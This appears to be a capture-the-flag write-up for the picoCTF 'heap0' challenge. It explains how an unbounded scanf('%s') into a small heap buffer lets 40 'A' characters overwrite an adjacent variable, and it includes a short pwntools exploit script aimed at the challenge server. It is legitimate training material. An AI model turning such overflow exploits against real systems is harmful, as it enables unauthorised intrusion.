heap0
⚒️ Heap 0
| Category | Author |
|---|---|
| ⚒️ Binary Exploitation | Abrxs, pr1or1tyQ |
Challenge Prompt
Are overflows just a stack concern?
Download the binary here.
Download the source here.
Problem Type
- Buffer Overflow
Solve
We are given the program source code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define FLAGSIZE_MAX 64
// amount of memory allocated for input_data
#define INPUT_DATA_SIZE 5
// amount of memory allocated for safe_var
#define SAFE_VAR_SIZE 5
int num_allocs;
char *safe_var;
char *input_data;
void check_win() {
if (strcmp(safe_var, "bico") != 0) {
printf("\nYOU WIN\n");
// code removed for brevity
void write_buffer() {
printf("Data for buffer: ");
fflush(stdout);
scanf("%s", input_data);
}
// code removed for brevity
In this program we are given the code wrote in C. The scanf function with the %s format specifier in the write_buffer function is inherently dangerous because it performs no bounds checking.
It will keep writing characters into input_data until it hits a space or a newline, completely ignoring the fact that input_data was only allocated 5 bytes (INPUT_DATA_SIZE at the begining of the code).
When we run the program we see 2 addresses and thier data. If we can overwrite bico we can get the program to print the flag.
We can take our 2 values and put them into a hex calculator like RapidTables and figure out how far apart the locations are:
In this case they are 32 bytes apart. So we need to send 32 A characters to make up the difference plus the characters we want to write over the bico.
You can simply send 40 A characters to the program after picking option 2 and then pick option 4 to print the flag, which is what I did at first.
But I wanted to get some more practice with pwntools so I decided to try that too:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
HOST = 'tethys.picoctf.net'
PORT = 55199
p = remote(HOST, PORT)
p.recvuntil(b'Enter your choice: ')
p.sendline(b"2")
p.recvuntil(b'Data for buffer: ')
p.sendline(b"A" * 40)
p.recvuntil(b'Enter your choice: ')
p.sendline(b"4")
print(p.recvall().decode())
